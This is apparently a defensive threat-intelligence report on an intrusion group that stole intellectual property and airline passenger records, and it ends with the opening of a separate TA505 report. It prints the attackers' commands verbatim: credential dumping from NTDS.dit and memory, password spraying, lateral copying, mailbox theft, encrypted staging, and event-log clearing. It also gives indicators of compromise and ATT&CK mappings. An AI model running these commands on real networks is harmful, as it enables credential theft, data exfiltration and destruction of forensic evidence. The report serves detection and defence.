From this portal it was possible to launch the web-based VPN. The VPN was protected by two-factor authentication (2FA) by sending an SMS with a one-time password (OTP) to the user account’s primary or alternate phone number. It was possible to configure an alternate phone number for the logged in user account at the company portal. The adversary used this opportunity to configure an alternate phone number controlled by the adversary.

By performing two-factor authentication interception by receiving the OTP on their own telephone number, they gained access to the company network via the VPN. However, they also made a mistake during this process within one incident. Our hypothesis is that they tested the 2FA-system first or selected the primary phone number to send a SMS to. However the European owner of the account received a text message with Simplified Chinese characters on the primary phone number in the middle of the night Eastern European Time (EET). NCC Group and Fox-IT identified that the language in the text-message for 2FA is based on the web browser’s language settings used during the authentication flow. Thus the 2FA code was sent with supporting Chinese text.

Account discovery (T1087)

With access into the network of the victim, the adversary finds a way to install a Cobalt Strike beacon on a system of the victim (see Execution). But before doing so, we observed the adversary checking the current permissions of the obtained user account with the following commands:

net user
net user Administrator
net user <username> /domain
net localgroup administrators

If the user account doesn’t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin’s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike’s built-in Mimikatz to dump its password hashes.

Privilege escalation (TA0004)

The adversary started a password spraying attack against those domain admin accounts, and successfully got a valid domain admin account this way. In other cases, the adversary moved laterally to another system with a domain admin logged in. We observed the use of Mimikatz on this system and saw the hashes of the logged in domain admin account going through the command and control channel of the adversary. The adversary used a tool called NtdsAudit to dump the password hashes of domain users as well as we observed the following command:

msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv

Note: the adversary renamed ntdsaudit.exe to msadcs.exe.

But we also observed the adversary using the tool ntdsutil to create a copy of the Active Directory database NTDS.dit followed by a repair action with esentutl to fix a possible corrupt NTDS.dit:

ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\tmp" q q
esentutl /p /o ntds.dit

Both ntdsutil and esentutl are by default installed on a domain controller.

A tool used by the adversary which wasn’t installed on the servers by default, was DSInternals. DSInternals is a PowerShell module that makes use of internal Active Directory features. The files and directories found on various systems of a victim match with DSInternals version 2.16.1. We have found traces that indicate DSInternals was executed and at which time, which match with the rest of the traces of the intrusion. We haven’t recovered traces of how the adversary used DSInternals, but considering the phase of the intrusion the adversary used the tool, it is likely they used it for either account discovery or privilege escalation, or both.

Execution (TA0002)

The adversary installs a hackers best friend during the intrusion: Cobalt Strike. Cobalt Strike is a framework designed for adversary simulation intended for penetration testers and red teams. It has been widely adopted by malicious threats as well.

The Cobalt Strike beacon is installed in memory by using a PowerShell one-liner. At least the following three versions of Cobalt Strike have been in use by the adversary:

  • Cobalt Strike v3.8, observed Q2 2017
  • Cobalt Strike v3.12, observed Q3 2018
  • Cobalt Strike v3.14, observed Q2 2019

Fox-IT has been collecting information about Cobalt Strike team servers since January 2015. This research project covers the fingerprinting of Cobalt Strike servers and is described in Fox-IT blog “Identifying Cobalt Strike team servers in the wild”. The collected information allows Fox-IT to correlate Cobalt Strike team servers, based on various configuration settings. Because of this, historic information was available during this investigation. Whenever a Cobalt Strike C2 channel was identified, Fox-IT performed lookups into the collection database. If a match was found, the configuration of the Cobalt Strike team server was analysed. This configuration was then compared against the other Cobalt Strike team servers to check for similarities in for example domain names, version number, URL, and various other settings.

The adversary heavily relies on scheduled tasks for executing a batch-file (.bat) to perform their tasks. An example of the creation of such a scheduled task by the adversary:

schtasks /create /ru "SYSTEM" /tn "update" /tr "cmd /c c:\windows\temp\update.bat" /sc once /f /st 06:59:00

The batch-files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system.

Persistence (TA0003)

The adversary loads the Cobalt Strike beacon in memory, without any persistence mechanisms on the compromised system. Once the system is rebooted, the beacon is gone. The adversary is still able to have persistent access by installing the beacon on systems with high uptimes, such as server. Besides using the Cobalt Strike beacon, the adversary also searches for VPN and firewall configs, possibly to function as a backup access into the network. We haven’t seen the adversary use those access methods after the first Cobalt Strike beacons were installed. Maybe because it was never necessary.

After the first bulk of data is exfiltrated, the persistent access into the victim’s network is periodically used by the adversary to check if new data of interest is available. They also create a copy of the NTDS.dit and SYSTEM-registry hive file for new credentials to crack.

Discovery (TA0007)

The adversary applied a wide range of discovery tactics. In the list below we have highlighted a few specific tools the adversary used for discovery purposes. You can find a summary of most of the commands used by the adversary to perform discovery at the end of this article.

Account discovery tool: PsLogList
Command used:

psloglist.exe -accepteula -x security -s -a <date>

This command exports a text file with comma separated fields. The text files contain the contents of the Security Event log after the specified date.

Psloglist is part of the Sysinternals toolkit from Mark Russinovich (Microsoft). The tool was used by the adversary on various systems to write events from the Windows Security Event Log to a text file. A possible intent of the adversary could be to identify if privileged users are active on the systems. If such a privileged user was recently active on a server the actor executes Cobalt Strike’s built-in Mimikatz to dump its credentials or password hash.

Account discovery tool: NtdsAudit
Command used:

msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv

It imports the specified Active Directory database NTDS.dit and registry file SYSTEM and exports the found password hashes into RecordedTV_pdump.txt and user details in RecordedTV_users.csv.

The NtdsAudit utility is an auditing tool for Active Directory databases. It allows the user to collect useful statistics related to accounts and passwords. The utility was found on various systems of a victim and matches the NtdsAudit.exe program file version v2.0.5 published on the GitHub project page.

Network service scanning
Command used:

get -b <start ip> -e <end ip> -p
get -b <start ip> -e <end ip>

Get.exe appears to be a custom tool used to scan IP-ranges for HTTP service information. NCC Group and Fox-IT decompiled the tool for analysis. This showed the tool was written in the Python scripting language and packed into a Windows executable file. Though Fox-IT didn’t find any direct occurrences of the tool on the internet, the decompiled code showed strong similarities with the source code of a tool named GetHttpsInfo. GetHttpsInfo scans the internal network for HTTP & HTTPS services. The reconnaissance tool getHttpsInfo is able to discover HTTP servers within the range of a network.

The tool was shared on a Chinese forum around 2016.

Figure 1: Example of a download location for GetHttpsInfo.exe

Lateral movement (TA0008)

The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. The adversary attempts to move to a domain controller as soon as possible after getting foothold into the victim’s network. They continue lateral movement and discovery in an attempt to identify the data of interest. This could be a webserver to carve PII from memory, or a fileserver to copy IP, as we have both observed.

At one customer, the data of interest was stored in a separate security zone. The adversary was able to find a dual homed system and compromise it. From there on they used it as a jump host into the higher security zone and started collecting the intellectual property stored on a file server in that zone.

In one event we saw the adversary compromise a Linux-system through SSH. The user account was possibly compromised on the Linux server by using credential stuffing or password spraying: Logfiles on the Linux-system show traces which can be attributed to a credential stuffing or password spraying attack.

Lateral tool transfer (T1570)

The adversary is applying living off the land techniques very well by incorporating default Windows tools in its arsenal. But not all tools used by the adversary are so called lolbins: As said before, they use Cobalt Strike. But they also rely on a custom tool for network scanning (get.exe), carving data from memory, compression of data, and exfiltrating data.

But first: How did they get the tools on the victim’s systems? The adversary copied those tools over SMB from compromised system to compromised system wherever they needed these tools. A few examples of commands we observed:

copy get.exe \\<ip>\c$\windows\temp\
copy msadc* \\<hostname>\c$\Progra~1\Common~1\System\msadc\
copy update.exe \\<ip>\c$\windows\temp\
move ak002.bat \\<ip>\c$\windows\temp\update.bat

Collection (TA0009)

In preparation of exfiltration of the data needed for their objective, the adversary collected the data from various sources within the victim’s network. As described before, the adversary collected data from an information repository, Microsoft SharePoint Online in this case. This document was exfiltrated and used to continue the intrusion via a company portal and VPN.

In all cases we’ve seen the adversary copying results of the discovery phase, like file- and directory lists from local systems, network shared drives, and file shares on remote systems. But email collection is also important for this adversary: with every intrusion we saw the mailbox of some users being copied, from both local and remote systems:

wmic /node:<ip> process call create "cmd /c copy c:\Users\<username>\<path>\backup.pst c:\windows\temp\backup.pst"
copy "i:\<path>\<username>\My Documents\<filename>.pst"
copy \\<hostname>\c$\Users\<username>\AppData\Local\Microsoft\Outlook*.ost

Files and folders of interest are collected as well and staged for exfiltration.

The goal of targeting some victims appears to be to obtain Passenger Name Records (PNR). How this PNR data is obtained likely differs per victim, but we observed the usage of several custom DLL files used to continuously retrieve PNR data from memory of systems where such data is typically processed, such as flight booking servers.

The DLL’s used were side-loaded in memory on compromised systems. After placing the DLL in the appropriate directory, the actor would change the date and time stamps on the DLL files to blend in with the other legitimate files in the directory.

Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the of the activities that NCC Group and Fox-IT has observed in the analysed C2 traffic.

We’ve seen the adversary staging data on a remote system or on the local system. Most of the times the data is compressed and copied at the same time. Only a handful of times the adversary copies the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command-line. The filename of the command-line executable for WinRAR is RAR.exe by default.

This activity group always uses a renamed version of rar.exe. We have observed the following filenames overlapping all intrusions:

  • jucheck.exe
  • RecordedTV.ms
  • teredo.tmp
  • update.exe
  • msadcs1.exe

The adversary typically places the executables in the following folders:

  • C:\Users\Public\Libraries\
  • C:\Users\Public\Videos\
  • C:\Windows\Temp\

The following four different variants of the use of rar.exe as update.exe we have observed:

update a -m5 -hp<password> <target_filename> <source>
update a -m5 -r -hp<password> <target_filename> <source>
update a -m5 -inul -hp<password> <target_filename> <source>
update a -m5 -r -inul -hp<password> <target_filename> <source>

The command lines parameters have the following effect:

  • a = add to archive.
  • m5 = use compression level 5.
  • r = recurse subfolders.
  • inul = suppress error messages.
  • hp<password> = encrypt both file data and headers with password.

The used password, file extensions for the staged data differ per intrusion. We’ve seen the use of .css, .rar, .log.txt, and no extension for staged pieces of data.

After compromising a host with a Linux operating systems, data is also compressed. This time the adversary compresses the data as a gzipped tar-file: tar.gz. Sometimes no file extension is used, or the file extension is .il. Most of the times the files names are prepended with adsDL_ or contain the word “list”. The files are staged in the home folder of the compromised user account: /home/<username>/

Command and control (TA0011)

The adversary uses Cobalt Strike as framework to manage their compromised systems. We observed the use of Cobalt Strike’s C2 protocol encapsulated in DNS by the adversary in 2017 and 2018. They switched to C2 encapsulated in HTTPS in Q3 2019. An interesting observation is they made use of a cracked/patched trial version of Cobalt Strike. This is important to note because the functionalities of Cobalt Strike’s trial version are limited. More importantly: the trial version doesn’t support encryption of command and control traffic in cases where the protocol itself isn’t encrypted, such as DNS. In one intrusion we investigated, the victim had years of logging available of outgoing DNS-requests. The DNS-responses weren’t logged. This means that only the DNS C2 leaving the victim’s network was logged. We developed a Python script that decoded and combined most of the logged C2 communication into a human readable format. As the adversary used Cobalt Strike with DNS as command & control protocol, we were able to reconstruct more than two years of adversary activity. With all this activity data, it was possible for us to create some insight into the ‘office’-hours of this adversary. The activity took place six days a week, rarely on Sundays. The activity started on average at 02:36 UTC and ended rarely after 13:00 UTC. We observed some periods where we expected activity of the adversary, but almost none was observed. These periods match with the Chinese Golden Week holiday.

Figure 2: Heatmap of activity. Times on the X-axis are in UTC.

The adversary also changed their domains for command & control around the same time they switched C2 protocols. They used a subdomain under a regular parent domain with a .com TLD in 2017 and 2018, but they started using sub-domains under the parent domain appspot.com and azureedge.net in 2019. The parent domain appspot.com is a domain owned by Google, and part of Google’s App Engine platform as a service. Azureedge.net is a parent domain owned by Microsoft, and part of Microsoft’s Azure content delivery network.

Exfiltration (TA0010)

The adversary uses the command and control channel to exfiltrate small amounts of data. This is usually information containing account details. For large amounts of data, such as the mailboxes and network shares with intellectual property, they use something else.

Once the larger chunks of data are compressed, encrypted, and staged, the data is exfiltrated using a custom built tool. This tool exfiltrates specified files to cloud storage web services. The following cloud storage web services are supported by the malware:

  • Dropbox
  • Google Drive
  • OneDrive

The actor specifies the following arguments when running the exfiltration tool:

  • Name of the web service to be used
  • Parameters used for the web service, such as a client ID and/or API key
  • Path of the file to read and exfiltrate to the web service

We have observed the exfiltration tool in the following locations:

  • C:\Windows\Temp\msadcs.exe
  • C:\Windows\Temp\OneDrive.exe

Hashes of these files are listed at the end of this article.

Defense evasion (TA0005)

The adversary attempts to clean-up some of the traces from their intrusions. While we don’t know what was deleted and we were unable to recover, we did see some of their anti-forensics activity:

  • Windows event logs clearing,
  • File deletion,
  • Timestomping

An overview of the observed commands can be found in the appendix.

For indicator removal on host: Timestomp the adversary uses a Windows version of the Linux touch command. This tool is included in the UnxUtils repository. This makes sure the used tools by the adversary blend in with the other files in the directory when shown in a timeline. Creating a timeline is a common thing to do for forensic analysts to get a chronological view of events on a system.

The same activity group?

A number of our intrusions involved tips from an industry partner who was able to correlate some of their upstream activity.

Our threat intelligence analysts observed clear overlap between the various cases that NCC Group and Fox-IT worked in the threat’s infrastructure and capabilities, and as a result we assess with moderate confidence one activity group was carrying out the intrusions across the different type of victims.

Some overlap is very generic for a lot for a lot of groups, like the use of Cobalt Strike, or exfiltration to OneDrive. But the tool used for exfiltration to OneDrive is very specific for this adversary. The use of appspot and azureedge domains as well. The naming convention for their subdomains, tools and scripts overlap too. In summary:

The adversary: Working hours match with GMT+8.

Infrastructure: appspot.com and azureedge.net for C2 with a strong overlap in naming convention for subdomains and actual overlap in some subdomains between intrusions.

Capability: Password spraying/credential stuffing. Cobalt Strike. Copy NTDS.dit. Use scheduled tasks and batch files for automation. The use of LOLBins. WinRAR. Cloud exfil tool and exfil to OneDrive. Erasing Windows Event Logs, files and tasks. Overlap in filenames for tools, staged data, and folders.

Victim: Semiconductors and aviation industry.

We considered labelling them as two activity groups, as of the difference in victims between various intrusions. But all the other overlap is strong enough for us to consider it as one group right now. This group might have gotten a new customer interested in different data which changed the intent and victims of the adversary.

But most importantly: The largest overlap is in the top half of the pyramid of pain: domain names, host artifacts, tools, and TTPs. And these are the hardest for the adversary to change, and most effective for long-lasting detection!

Figure 3: Pyramid of pain by David J Bianco

Fox-IT and NCC Group found some very strong overlap between what we’ve seen in our intrusion, and what Cycraft describes in their APT Group Chimera report and Blackhat presentation. The bulk of the victims they describe are in different regions than we observed which is likely caused by field of view bias. SentinelOne also describes an attack and shares IOC’s that show strong overlap with the intrusions we investigated.

Conclusion

At this moment we believe based on the evidence observed that the various intrusions were performed by the same group. We can only report what we observed: first they stole intellectual property in the high tech sector, later they stole passenger name records (PNR) from airlines, both across geographical locations. Both types of stolen data are very useful for nation states.

Answering if this group has an advanced persistent threat (APT) technique, has some sort of state affiliation, or where they come from goes beyond the scope of this write-up. The threat intelligence and IOC’s we are sharing are intended to help discover and present intrusions by this and adversaries.

A word of thanks goes out to all the forensic experts, incident responders, and threat intelligence analysts who helped victims identifying and eradicating the adversary. And everybody from NCC Group and Fox-IT (part of NCC Group) for all the contributions to this article.

IOC

Type Data Observed Note
Binary MD5 133a159e86ff48c59e79e67a3b740c1e get.exe (GetHttpsInfo)
Binary MD5 328ba584bd06c3083e3a66cb47779eac psloglist.exe
Binary MD5 65cf35ddcb42c6ff5dc56d6259cc05f3 update.exe (WinRAR)
Binary MD5 4d5440282b69453f4eb6232a1689dd4a msadcs.exe (Cloud exfil tool)
Binary MD5 90508ff4d2fc7bc968636c716d84e6b4 msadcs.exe (Cloud exfil tool)
Binary MD5 c9b8cab697f23e6ee9b1096e312e8573 jucheck.exe (WinRAR)
Binary MD5 dd138a8bc1d4254fed9638989da38ab1 msadcs.exe (NTDSAudit)
C2 domain EuDbSyncUp[.]com Q4 2017 – Q4 0218
C2 domain UsMobileSos[.]com Q4 2017 – Q4 2018
C2 domain officeeuupdate.appspot[.]com Q4 2017 – Q4 2018
C2 domain MsCupDb[.]com Q4 2017 – Q4 2018
C2 domain officeeuropupd.appspot[.]com Q3 2019 – Q1 2020
C2 domain platform-appses.appspot[.]com Q4 2019 – Q1 2020
C2 domain watson-telemetry.azureedge[.]net Q4 2019 – Q1 2020
C2 domain europe-s03213.appspot[.]com 2019
C2 domain eustylejssync.appspot[.]com  2019
C2 domain fsdafdsfdsaflkjkxvzcuifsad.azureedge[.]net 2019
C2 domain ictsyncserver.appspot[.]com 2019
C2 domain sowfksiw38f2aflwfif.azureedge[.]net  2019
Filename fs_action*.bat Task automation
Filename fs_action*.ps1 Task automation
Filename update.bat Task automation
Filename update*.bat Task automation
Filename *dsinternals*.dll  Dsinternals lib files 
Filename get.exe GetHttpsInfo
Filename adsDL_<dir>.log Staging data
Filename group_membership.csv SharpHound output
Filename local_admins.csv SharpHound output
Filename msadcs.exe Various tools
Filename msadcs1.exe WinRAR
Filename OneDrive.exe Cloud data exfil
Filename sessions.csv SharpHound output
Filename RecordedTV.ms WinRAR
Filename RecordedTV_*.csv Staging data
Filename RecordedTV_*.ms Staging data
Filename RecordedTV_*.rar Staging data
Filename RecordedTV_*.txt Staging data
Filename teredo.tmp WinRAR
Filename update.exe WinRAR
Filename hsperfdata.sqm Archive with tools
Filename update*.log Staging data
Hostname DESKTOP-0FVJ37C Origin of login to Exchange
IPv4 address 47.75.0[.]147 Q2 2019 Password spray
IPv4 address 59.47.4[.]27 Q2 2019 ADFS login
IPv4 address 45.9.248[.]74 Q2 2019 Citrix login
IPv4 address 172.111.210[.]53 Q2 2019 Citrix login
IPv4 address 103.51.145[.]123  2019 Initial access 
IPv4 address 119.39.248[.]32  2019 Initial access
IPv4 address 120.227.35[.]98  2019 Initial access
IPv4 address 14.229.140[.]66  2019 Mount the file-share 
IPv4 address 172.111.210[.]53  2019 Initial access
IPv4 address 188.72.99[.]41  2019 Initial access
IPv4 address 45.9.248[.]74  2019 Initial access
IPv4 address 47.75.0[.]147  2019 Password spray
IPv4 address 5.254.112[.]226  2019 Initial access
IPv4 address 5.254.64[.]234  2019 Initial access
IPv4 address 59.47.4[.]27  2019 Initial access
IPv4 address 39.109.5[.]135 Q3 2017 VPN server login
IPv4 address 43.250.200[.]106 Q3 2017 VPN server login
IPv4 address 119.39.248[.]101 Q3 2017 VPN server login
IPv4 address 220.202.152[.]47 Q3 2017 VPN server login
IPv4 address 119.39.248[.]20 Q3 2017 VPN server login
IPv4 address 185.170.210[.]84 Q3 2017 VPN server login
IPv4 address 43.250.201[.]71 Q3 2017 VPN server login
IPv4 address 23.236.77[.]94 Q3 2017 ADFS login
Path C:\Code\NtdsAudit\src\NtdsAudit\obj\Release\ NTDSAudit artifacts
Path C:\Users\Public\Appdata\Local\ Staging and tools
Path C:\Users\Public\Appdata\Local\Microsoft\Windows\INetCache Staging and tools
Path C:\Users\Public\Libraries\ Staging and tools
Path C:\Users\Public\Videos\ Staging and tools
Path C:\Windows\Temp\ Staging and tools
Path C:\Windows\Temp\tmp Staging and tools
URI in CS beacon /externalscripts/jquery/jquery-3.3.1.min.js  Q3 2019 – Q1 2020
URI in CS beacon /externalscripts/jquery/jquery-3.3.2.min.js Q2 2019 – Q3 2019
URI in CS beacon /jquery-3.3.2.slim.min.js Q1 2020
User-agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Web VPN login
User-agent Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Cobalt Strike beacon

Observed discovery commands

Technique Command
Account discovery net user
Account discovery net user Administrator
Account discovery net user /domain
Account discovery dir \\<hostname>\c$\users
Account discovery dsquery user -limit 0 -s <hostname>
Account discovery psloglist.exe -accepteula -x security -s -a <current_date>
Account discovery msadcs.exe  “NTDS.dit” -s “SYSTEM” -p RecordedTV_pdmp.txt –users-csv RecordedTV_users.csv
Browser bookmark discovery type \\<hostname>\c$\Users\<username>\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*
Domain trust discovery nltest /domain_trusts
File and directory discovery dir \\<hostname>\c$\
File and directory discovery dir /o:d /x /s c:\
File and directory discovery dir /o:d /x \\<hostname>\<fileshare>
File and directory discovery cacl <path to file>
Network service scanning get -b <start ip> -e <end ip> -p
Network service scanning get -b <start ip> -e <end ip>
Network share discovery net share
Network share discovery net view \\<hostname>
Permission groups discovery net localgroup administrators
Process discovery tasklist /v |findstr explorer
Process discovery tasklist /v |findstr taskhost
Process discovery tasklist /v |findstr 1716
Process discovery tasklist /v /s <hostname/ip>
Query registry reg query \\<host>\HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Query registry reg query \\<host>\HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Remote system discovery type \\<host>\c$\Users\<username>\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*
Remote system discovery type \\<host>\<path>\Cookies\*ctx*
Remote system discovery reg query \\<host>\HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Remote system discovery dir /o:d /x \\<hostname>\c$\users\<username>\Favorites
Remote system discovery net view \\hostname
Remote system discovery dsquery server -limit 0
System information discovery fsutil fsinfo drives
System information discovery systeminfo
System information discovery vssadmin list shadows
System network configuration discovery ipconfig
System network configuration discovery ipconfig /all
System network configuration discovery ping -n 1 -a <ip>
System network configuration discovery ping -n 1 <hostname>
System network configuration discovery tracert <ip>
System network configuration discovery pathping <ip>
System network connections discovery netstat -ano | findstr EST
System Owner/User Discovery quser
System service discovery net start
System service discovery net use
System time discovery time /t
System time discovery net time \\<ip/hostname>

Observed Defense evasion commands


Indicator Removal on Host: Clear Windows Event Logs

wevtutil cl "Windows PowerShell"
wevtutil cl application
wevtutil cl security
wevtutil cl setup
wevtutil cl system

Indicator Removal on Host: File Deletion

del /f/q *.csv *.bin
del /f/q *.exe
del /f/q *.exe *log.txt
del /f/q *.ost
del /f/q .rar update .txt
del /f/q \\c$\windows\temp*.txt
del /f/q \\c$\Progra~1\Common~1\System\msadc\msadcs.dmp
del /f/q msadcs*
del /f/q psloglist.exe
del /f/q update*
del /f/q update* .txt del /f/q update.rar
del /f/q update*rar
del /f/q update12321312.rarschtasks /delete /s /tn "update" /f

schtasks /delete /tn "update" /f

shred -n 123 -z -u .tar.gz

MITRE ATT&CK references

Name Type ID More info
Initial Access Tactic TA0001 https://attack.mitre.org/tactics/TA0001/
External Remote Services Technique T1133 https://attack.mitre.org/techniques/T1133/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Execution Tactic TA0002 https://attack.mitre.org/tactics/TA0002/
Command and Scripting Interpreter: PowerShell Technique T1059.001 https://attack.mitre.org/techniques/T1059/001/
Command and Scripting Interpreter: Windows Command Shell Technique T1059.003 https://attack.mitre.org/techniques/T1059/003/
Scheduled Task/Job: Scheduled Task Technique T1053.005 https://attack.mitre.org/techniques/T1053/005/
System Services: Service Execution Technique T1569.002 https://attack.mitre.org/techniques/T1569/002/
Windows Management Instrumentation Technique T1047 https://attack.mitre.org/techniques/T1047/
Persistence Tactic TA0003 https://attack.mitre.org/tactics/TA0003/
External Remote Services Technique T1133 https://attack.mitre.org/techniques/T1133/
Hijack Execution Flow: DLL Side-Loading Technique T1574.002 https://attack.mitre.org/techniques/T1574/002/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Privilege Escalation Tactic TA0004 https://attack.mitre.org/tactics/TA0004/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Defense Evasion Tactic TA0005 https://attack.mitre.org/tactics/TA0005/
Deobfuscate/Decode Files or Information Technique T1140 https://attack.mitre.org/techniques/T1140/
Indicator Removal on Host: Clear Windows Event Logs Technique T1070.001 https://attack.mitre.org/techniques/T1070/001/
Indicator Removal on Host: File Deletion Technique T1070.004 https://attack.mitre.org/techniques/T1070/004/
Indicator Removal on Host: Timestomp Technique T1070.006 https://attack.mitre.org/techniques/T1070/006/
Hijack Execution Flow: DLL Side-Loading Technique T1574.002 https://attack.mitre.org/techniques/T1574/002/
Masquerading: Rename System Utilities Technique T1036.003 https://attack.mitre.org/techniques/T1036/003/
Masquerading: Match Legitimate Name or Location Technique T1036.005 https://attack.mitre.org/techniques/T1036/005/
Use Alternate Authentication Material: Pass the Hash Technique T1550.002 https://attack.mitre.org/techniques/T1550/002/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Credential Access Tactic TA0006 https://attack.mitre.org/tactics/TA0006/
Brute Force: Password Spraying Technique T1110.003 https://attack.mitre.org/techniques/T1110/003/
Brute Force: Credential Stuffing Technique T1110.004 https://attack.mitre.org/techniques/T1110/004/
OS Credential Dumping: LSASS Memory Technique T1003.001 https://attack.mitre.org/techniques/T1003/001/
OS Credential Dumping: NTDS Technique T1003.003 https://attack.mitre.org/techniques/T1003/003/
Two-Factor Authentication Interception Technique T1111 https://attack.mitre.org/techniques/T1111/
Discovery Tactic TA0007 https://attack.mitre.org/tactics/TA0007/
Account Discovery Technique T1087  
Account Discovery: Local Account Technique T1087.001 https://attack.mitre.org/techniques/T1087/001/
Account Discovery: Domain Account Technique T1087.002 https://attack.mitre.org/techniques/T1087/002/
Browser Bookmark Discovery Technique T1217 https://attack.mitre.org/techniques/T1217/
Domain Trust Discovery Technique T1482 https://attack.mitre.org/techniques/T1482/
File and Directory Discovery Technique T1083 https://attack.mitre.org/techniques/T1083
Network Service Scanning Technique T1046 https://attack.mitre.org/techniques/T1046
Network Share Discovery Technique T1135 https://attack.mitre.org/techniques/T1135
Permission Groups Discovery Technique T1069 https://attack.mitre.org/techniques/T1069
Process Discovery Technique T1057 https://attack.mitre.org/techniques/T1057
Query Registry Technique T1012 https://attack.mitre.org/techniques/T1012
Remote System Discovery Technique T1018 https://attack.mitre.org/techniques/T1018
System Information Discovery Technique T1082 https://attack.mitre.org/techniques/T1082
System Network Configuration Discovery Technique T1016 https://attack.mitre.org/techniques/T1016
System Network Connections Discovery Technique T1049 https://attack.mitre.org/techniques/T1049
System Owner/User Discovery Technique T1033 https://attack.mitre.org/techniques/T1033
System Service Discovery Technique T1007 https://attack.mitre.org/techniques/T1007
System Time Discovery Technique T1124 https://attack.mitre.org/techniques/T1124
Lateral Movement Tactic TA0008 https://attack.mitre.org/tactics/TA0008/
Lateral Tool Transfer Technique T1570 https://attack.mitre.org/techniques/T1570/
Remote Services: SMB/Windows Admin Shares Technique T1021.002 https://attack.mitre.org/techniques/T1021/002/
Remote Services: SSH Technique T1021.004 https://attack.mitre.org/techniques/T1021/004/
Remote Services: Windows Remote Management Technique T1021.006 https://attack.mitre.org/techniques/T1021/006/
Use Alternate Authentication Material: Pass the Hash Technique T1550.002 https://attack.mitre.org/techniques/T1550/002/
Collection Tactic TA0009 https://attack.mitre.org/tactics/TA0009/
Archive Collected Data: Archive via Utility Technique T1560.001 https://attack.mitre.org/techniques/T1560/001/
Automated Collection Technique T1119 https://attack.mitre.org/techniques/T1119/
Data from Information Repositories: SharePoint Technique T1213.002 https://attack.mitre.org/techniques/T1213/002/
Data from Local System Technique T1005 https://attack.mitre.org/techniques/T1005/
Data from Network Shared Drive Technique T1039 https://attack.mitre.org/techniques/T1039/
Data Staged: Local Data Staging Technique T1074.001 https://attack.mitre.org/techniques/T1074/001/
Data Staged: Remote Data Staging Technique T1074.002 https://attack.mitre.org/techniques/T1074/002/
Email Collection: Local Email Collection Technique T1114.001 https://attack.mitre.org/techniques/T1114/001/
Command and Control Tactic TA0011 https://attack.mitre.org/tactics/TA0011/
Application Layer Protocol: Web Protocols Technique T1071.001 https://attack.mitre.org/techniques/T1071/001/
Application Layer Protocol: DNS Technique T1071.004 https://attack.mitre.org/techniques/T1071/004/
Encrypted Channel: Asymmetric Cryptography Technique T1573.002 https://attack.mitre.org/techniques/T1573/002/
Protocol Tunneling Technique T1572 https://attack.mitre.org/techniques/T1572/
Exfiltration Tactic TA0010 https://attack.mitre.org/tactics/TA0010/
Automated Exfiltration Technique T1020 https://attack.mitre.org/techniques/T1020/
Data Transfer Size Limits Technique T1030 https://attack.mitre.org/techniques/T1030/
Exfiltration Over C2 Channel Technique T1041 https://attack.mitre.org/techniques/T1041/
Exfiltration Over Web Service: Exfiltration to Cloud Storage Technique T1567.002 https://attack.mitre.org/techniques/T1567/002/

TA505: A Brief History Of Their Time

Threat Intel Analyst: Antonis Terefos (@Tera0017)
Data Scientist: Anne Postma (@A_Postma)

1. Introduction

TA505 is a sophisticated and innovative threat actor, with plenty of cybercrime experience, that engages in targeted attacks across multiple sectors and geographies for financial gain. Over time, TA505 evolved from a lesser partner to a mature, self-subsisting and versatile crime operation with a broad spectrum of targets. Throughout the years the group heavily relied on third party services and tooling to support its fraudulent activities, however, the group now mostly operates independently from initial infection until monetization.

Throughout 2019, TA505 changed tactics and adopted a proven simple, although effective, attack strategy: encrypt a corporate network with ransomware, more specifically the Clop ransomware strain, and demand a ransom in Bitcoin to obtain the decryption key. Targets are selected in an opportunistic fashion and TA505 currently operates a broad attack arsenal of both in-house developed and publicly available tooling to exploit its victims. In the Netherlands, TA505 is notorious for their involvement on the Maastricht University incident in December 2019. 

To obtain a foothold within targeted networks, TA505 heavily relies on two pieces of malware: Get2/GetandGo and SDBbot. Get2/GetandGo functions as a simple loader responsible for gathering system information, C&C beaconing and command execution. SDBbot is the main remote access tool, written in C++ and downloaded by Get2/GetandGo, composed of three components: an installer, a loader and the RAT.

During the period March to June 2020, Fox-IT didn’t spot as many campaigns in which TA505 distributed their proven first stage malware. In early June 2020 however, TA505 continued to push their flavored GetandGo-SDBbot campaigns thereby slightly adjusting their chain of infection, now leveraging HTML redirects. In the meantime – and in line with other targeted ransomware gangs – TA505 started to operate a data leak platform dubbed “CL0P^_- LEAKS” on which stolen corporate data of non-paying victims is publicly disclosed.

The research outlined in this blog is focused around obtained Get2/GetandGo and SDBbot samples. We unpacked the captured samples and organized them within their related campaign. This resulted in providing us an accurate view on the working schedule of the TA505 group during the past year.

2. Infection Chain and Tooling

As mentioned above, the Threat Actor uses private as well as public tooling to get access, infect the network and drop Clop ransomware.

2.1. Email – XLS – GetandGo

Figure 1. Initial Infection
Figure 1. Initial Infection


1. The victim receives an HTML attachment. This file contains a link to a malicious website. Once the file is opened in a browser, it redirects to this compromised URL.

